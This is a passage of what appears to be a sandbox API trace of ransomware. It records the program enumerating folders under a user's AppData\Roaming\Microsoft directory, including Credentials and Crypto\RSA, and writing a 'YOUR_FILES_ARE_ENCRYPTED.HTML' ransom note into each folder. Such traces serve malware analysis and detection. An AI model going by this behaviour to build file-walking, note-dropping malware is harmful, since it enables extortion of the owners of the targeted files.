hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6df360d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x60, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 75 [0165.072] lstrcmpW (lpString1="GB.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GB.XSL") returned=".XSL" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6df360d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x60, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 81 [0165.072] lstrcmpW (lpString1="GostName.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GostName.XSL") returned=".XSL" [0165.072] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dee9e10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x60, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 82 [0165.072] lstrcmpW (lpString1="GostTitle.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0165.072] lstrlenW (lpString=".XSL") returned 4 [0165.072] PathFindExtensionW (pszPath="GostTitle.XSL") returned=".XSL" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dee9e10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x60, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0165.072] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 102 [0165.072] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.072] PathFindExtensionW 
(pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0165.072] lstrlenW (lpString=".xsl") returned 4 [0165.072] PathFindExtensionW (pszPath="HarvardAnglia2008OfficeOnline.xsl") returned=".xsl" [0165.072] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x60, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 93 [0165.073] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0165.073] lstrlenW (lpString=".xsl") returned 4 [0165.073] PathFindExtensionW (pszPath="IEEE2006OfficeOnline.xsl") returned=".xsl" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x60, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 79 [0165.073] lstrcmpW (lpString1="ISO690.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0165.073] lstrlenW (lpString=".XSL") returned 4 [0165.073] PathFindExtensionW (pszPath="ISO690.XSL") returned=".XSL" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e209af0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x60, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 87 [0165.073] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0165.073] lstrlenW (lpString=".XSL") returned 4 [0165.073] PathFindExtensionW (pszPath="ISO690Nmerical.XSL") returned=".XSL" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e7fd1f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="MLASeventhEditionOfficeOnline.xsl", 
cAlternateFileName="MLASEV~1.XSL")) returned 1 [0165.073] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 102 [0165.073] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.073] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0165.073] lstrlenW (lpString=".xsl") returned 4 [0165.073] PathFindExtensionW (pszPath="MLASeventhEditionOfficeOnline.xsl") returned=".xsl" [0165.073] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e1bd830, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0165.074] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 79 [0165.074] lstrcmpW (lpString1="SIST02.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.074] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0165.074] lstrlenW (lpString=".XSL") returned 4 [0165.074] PathFindExtensionW (pszPath="SIST02.XSL") returned=".XSL" [0165.074] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e08cd30, 
ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x60, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0165.074] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 81 [0165.074] lstrcmpW (lpString1="TURABIAN.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.074] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0165.074] lstrlenW (lpString=".XSL") returned 4 [0165.074] PathFindExtensionW (pszPath="TURABIAN.XSL") returned=".XSL" [0165.074] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1ad920, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e08cd30, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x60, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0165.074] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.076] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0165.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\bibliography\\style\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.079] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.081] CloseHandle (hObject=0x304) returned 1 [0165.082] GetProcessHeap () returned 0x270000 [0165.083] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.083] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Style", cAlternateFileName="")) returned 0 [0165.083] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.083] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0165.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\bibliography\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.084] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.087] CloseHandle (hObject=0x5e4) returned 1 [0165.087] GetProcessHeap () returned 0x270000 [0165.088] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.088] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0165.088] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials") returned 61 [0165.088] GetProcessHeap () returned 0x270000 [0165.088] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.088] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials" [0165.088] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0165.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.089] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.089] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.089] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.089] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0165.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.090] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.094] CloseHandle (hObject=0x5e4) returned 1 [0165.094] GetProcessHeap () returned 0x270000 [0165.095] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.095] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0165.095] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto") returned 56 [0165.095] GetProcessHeap () returned 0x270000 [0165.095] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.095] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto" [0165.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0165.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.096] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0165.096] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 60 [0165.096] GetProcessHeap () returned 0x270000 [0165.096] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.096] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0165.096] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0165.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.097] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.097] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.097] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.097] wnsprintfW (in: 
